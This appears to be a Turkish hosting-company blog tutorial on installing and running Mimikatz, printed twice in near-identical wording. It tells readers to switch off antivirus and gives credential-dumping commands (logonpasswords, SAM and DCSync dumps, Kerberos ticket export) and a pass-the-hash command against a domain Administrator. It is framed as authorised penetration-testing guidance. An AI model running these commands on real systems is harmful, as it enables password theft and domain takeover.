Mimikatz’ı Windows işletim sisteminde nasıl kurulur ve kullanılır

AMDAMD Ryzen 5 4650G 16GB DDR 4 ECC AMD Ryzen 5 4650G Ryzen Dedicated Server Animation
20%
85€ 68€
Order Now

Giriş

Mimikatz, bellekten düz metin olarak şifreleri, hash’leri, PIN kodlarını ve Kerberos biletlerini çıkarmak için tasarlanmış güçlü bir araçtır. Sistem güvenlik açıklarını değerlendirmek için penetrasyon test uzmanları ve güvenlik profesyonelleri tarafından yaygın olarak kullanılmaktadır. Bu kılavuz, etik güvenlik testi için Mimikatz’ı kurma ve kullanma konusunda adım adım bir yaklaşım sunmaktadır.

Uyarı: Mimikatz’ın yetkisiz kullanımı yasadışıdır. Herhangi bir ortamda kullanmadan önce açık izin aldığınızdan emin olun.

Ön Gereksinimler

Mimikatz’ı kurmadan önce aşağıdakilerin mevcut olduğundan emin olun:

  • Bir Windows makinesi (Windows 7, 10, 11 veya Server)

  • Yönetici ayrıcalıkları

  • Windows Defender ve herhangi bir antivirüs yazılımı devre dışı (Mimikatz genellikle kötü amaçlı yazılım olarak işaretlenir)

Mimikatz İndirme

Mimikatz, GitHub’da bulunan açık kaynaklı bir araçtır. İndirmek için:

  1. Web tarayıcınızı açın ve gidin
    https://github.com/gentilkiwi/mimikatz

  2. Tıklayın Kod > ZIP’i İndir.

  3. ZIP dosyasını seçtiğiniz bir dizine çıkarın.

Ayrıca Git kullanarak depoyu klonlayabilirsiniz:

git clone https://github.com/gentilkiwi/mimikatz.git

Mimikatz’ı Çalıştırma

Mimikatz yönetici ayrıcalıkları gerektirdiğinden, bu adımları izleyin:

  1. Yönetici olarak Komut İstemi veya PowerShell açın.

  2. Mimikatz’ı çıkardığınız klasöre gidin:

    cd pathtomimikatzx64
  3. Mimikatz’ı başlatın:

    mimikatz.exe

Artık komut satırı arayüzünü ve istemini görmelisiniz:
mimikatz #

Temel Mimikatz Komutları

1. Sistem Ayrıcalıklarını Kontrol Et

Kimlik bilgilerini çıkarmadan önce yeterli ayrıcalıklara sahip olduğunuzu doğrulayın:

privilege::debug

Başarılıysa, şunu görmelisiniz:
Ayrıcalık ’20’ OK

Bellekten Şifreleri Çıkar

Bellekte saklanan şifreleri çıkarmak için:

sekurlsa::logonpasswords

Bu, mevcutsa kullanıcı adlarını, alanları ve düz metin şifrelerini gösterecektir.

NTLM Hash’lerini Dök

NTLM hash’leri pass-the-hash saldırıları için kullanılabilir. Çıkarmak için:

lsadump::sam

Veya uzak sistemler için:

lsadump::dcsync /domain:targetdomain.com /user:Administrator

Kerberos Biletlerini Dök

Sistemden Kerberos biletlerini çıkarmak için:

sekurlsa::tickets /export

Bu, pass-the-ticket saldırılarında kullanılabilecek .kirbi dosyalarını dışa aktarır.

Pass-the-Hash Saldırısı

Bir şifre yerine NTLM hash’i kullanarak kimlik doğrulamak için:

sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash>

Sonuç

Mimikatz, şifreleri, hash’leri ve Kerberos biletlerini doğrudan bellekten çıkarma yeteneği sayesinde Windows sistemlerinin güvenliğini değerlendirmek için en güçlü araçlardan biri olmaya devam etmektedir. Sorumlu ve etik bir şekilde kullanıldığında, profesyonellere güvenlik açıklarını tanımlama, alan altyapı yapılandırmalarını doğrulama ve bir kuruluşun genel güvenlik duruşunu artırma konusunda yardımcı olmaktadır. Ancak, Mimikatz gibi araçların yalnızca resmi yetki ile ve kontrol altındaki ortamlarda kullanılmasının kritik olduğunu unutmamak önemlidir, çünkü yetkisiz kullanım yasaları ihlal eder ve ciddi sonuçlara yol açabilir.

Giriş

Mimikatz, bellekten düz metin olarak şifreler, hash’ler, PIN kodları ve Kerberos biletleri çıkarmak için tasarlanmış güçlü bir araçtır. Sistem zafiyetlerini değerlendirmek için penetrasyon test uzmanları ve güvenlik profesyonelleri tarafından yaygın olarak kullanılmaktadır. Bu kılavuz, etik güvenlik testleri için Mimikatz’ın nasıl kurulacağı ve kullanılacağına dair adım adım bir yaklaşım sunmaktadır.

Uyarı: Mimikatz’ın yetkisiz kullanımı yasadışıdır. Herhangi bir ortamda kullanmadan önce açık izin aldığınızdan emin olun.

Ön Gereksinimler

Mimikatz’ı kurmadan önce aşağıdakilerin mevcut olduğundan emin olun:

  • Bir Windows makinesi (Windows 7, 10, 11 veya Server)

  • Yönetici ayrıcalıkları

  • Windows Defender ve herhangi bir antivirüs yazılımı devre dışı (Mimikatz genellikle kötü amaçlı yazılım olarak işaretlenir)

Mimikatz’ı İndirme

Mimikatz, GitHub’da bulunan açık kaynaklı bir araçtır. İndirmek için:

  1. Web tarayıcınızı açın ve şu adrese gidin:
    https://github.com/gentilkiwi/mimikatz

  2. Tıklayın Kod > ZIP İndir.

  3. ZIP dosyasını istediğiniz bir dizine çıkarın.

Ayrıca, Git kullanarak depoyu klonlayabilirsiniz:

git clone https://github.com/gentilkiwi/mimikatz.git

Mimikatz’ı Çalıştırma

Mimikatz yönetici ayrıcalıkları gerektirdiğinden, şu adımları izleyin:

  1. Yönetici olarak Komut İstemi veya PowerShell açın.

  2. Mimikatz’ı çıkardığınız klasöre gidin:

    cd pathtomimikatzx64
  3. Mimikatz’ı başlatın:

    mimikatz.exe

Artık komut satırı arayüzünü ve istemini görmelisiniz:
mimikatz #

Temel Mimikatz Komutları

1. Sistem Ayrıcalıklarını Kontrol Et

Kimlik bilgilerini çıkarmadan önce yeterli ayrıcalıklara sahip olduğunuzu doğrulayın:

privilege::debug

Başarılı olursa, şunu görmelisiniz:
Ayrıcalık ’20’ OK

Bellekten Şifreleri Çıkar

Bellekte saklanan şifreleri çıkarmak için:

sekurlsa::logonpasswords

Bu, mevcutsa kullanıcı adlarını, alanları ve düz metin şifrelerini gösterecektir.

NTLM Hash’lerini Dökme

NTLM hash’leri, pass-the-hash saldırıları için kullanılabilir. Çıkarmak için:

lsadump::sam

Veya uzak sistemler için:

lsadump::dcsync /domain:targetdomain.com /user:Administrator

Kerberos Biletlerini Dökme

Sistemden Kerberos biletlerini çıkarmak için:

sekurlsa::tickets /export

Bu, pass-the-ticket saldırılarında kullanılabilecek .kirbi dosyalarını dışa aktarır.

Pass-the-Hash Saldırısı

Bir şifre yerine NTLM hash’i kullanarak kimlik doğrulamak için:

sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash>

Sonuç

Mimikatz, şifreleri, hash’leri ve Kerberos biletlerini doğrudan bellekten çıkarabilme yeteneği sayesinde Windows sistemlerinin güvenliğini değerlendirmek için en güçlü araçlardan biri olmaya devam etmektedir. Sorumlu ve etik bir şekilde kullanıldığında, profesyonellere zafiyetleri tanımlama, alan altyapı yapılandırmalarını doğrulama ve bir kuruluşun genel güvenlik duruşunu artırma konusunda yardımcı olur. Ancak, Mimikatz gibi araçların yalnızca resmi yetki ile ve kontrol altında olan ortamlarda kullanılmasının kritik öneme sahip olduğunu unutmamak gerekir; çünkü yetkisiz kullanım yasaları ihlal eder ve ciddi sonuçlara yol açabilir.